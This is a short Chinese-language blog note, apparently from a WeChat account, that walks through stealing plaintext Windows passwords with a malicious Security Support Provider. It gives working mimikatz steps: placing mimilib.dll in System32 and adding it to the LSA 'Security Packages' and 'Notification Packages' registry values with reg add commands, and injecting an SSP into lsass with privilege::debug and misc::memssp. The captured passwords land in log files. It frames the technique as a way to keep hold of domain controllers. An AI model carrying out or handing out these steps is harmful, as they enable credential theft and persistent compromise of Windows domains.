安全支持提供程序(SSP)是一个dll文件,用于扩展Windows身份验证机制。
我们熟悉的lsass进程在启动时会加载安全支持提供程序SSP。当我们替换某个ssp为恶意ssp,或者将ssp文件上传,修改lsa注册表使之启动时加载,然后我们就可以利用恶意dll将输入lsass程序的明文密码保存下来,实现抓明文密码。
此方法适用于win8/win2012后无法获取明文密码,或者维持域控、在域控上抓用户密码
在mimikatz中有32和64两个版本,安装包里分别都带有不同位数的mimilib.dll
复制mimilib.dll放到System32路径下,注意版本对应32或64位系统
然后修改hklmsystemcurrentcontrolsetcontrollsa注册表中Security Packages项的值来加载新的安全支持提供程序mimilib.dll
reg add "hklmsystemcurrentcontrolsetcontrollsa" /v "Security Packages" /t REG_MULTI_SZ /d "kerberos msv1_0 schannel wdigest tspkg pku2u mimilib" /f
当用户或域用户登录时,在c:windowssystem32生成文件kiwissp.log,记录登录用户的明文密码
C:WindowsSystem32kiwissp.log
mimikatz支持向lsass注入ssp,此技术不需要将mimilib.dll放入磁盘或创建注册表项,不需要重启既可以获取账户信息
privilege::debug
misc::memssp
rundll32 user32.dll LockWorkStation
等用户输入密码登录后,将在System32中创建一个日志文件记录明文密码
C:WindowsSystem32mimilsa.log
mimilib.dll里面的函数很多,功能很强,还有一个功能就是记录你修改的密码
将mimilib.dll移动到System32路径下
修改hklmSystemCurrentControlSetControlLsa注册表Notification Packages项的值,在其中添加一个mimilib
reg add "hklmSystemCurrentControlSetControlLsa" /v "Notification Packages" /t REG_MULTI_SZ /d "scecli rassfm mimilib" /f
重新启动系统,当系统发生修改密码的事件时,将生成一个日志文件记录用户新修改的明文密码
C:WindowsSystem32kiwifilter.log
最近比较菜,没东西写了,只能发发笔记不然断更了。。。
本文始发于微信公众号(XG小刚):SSP方式获取win明文密码
评论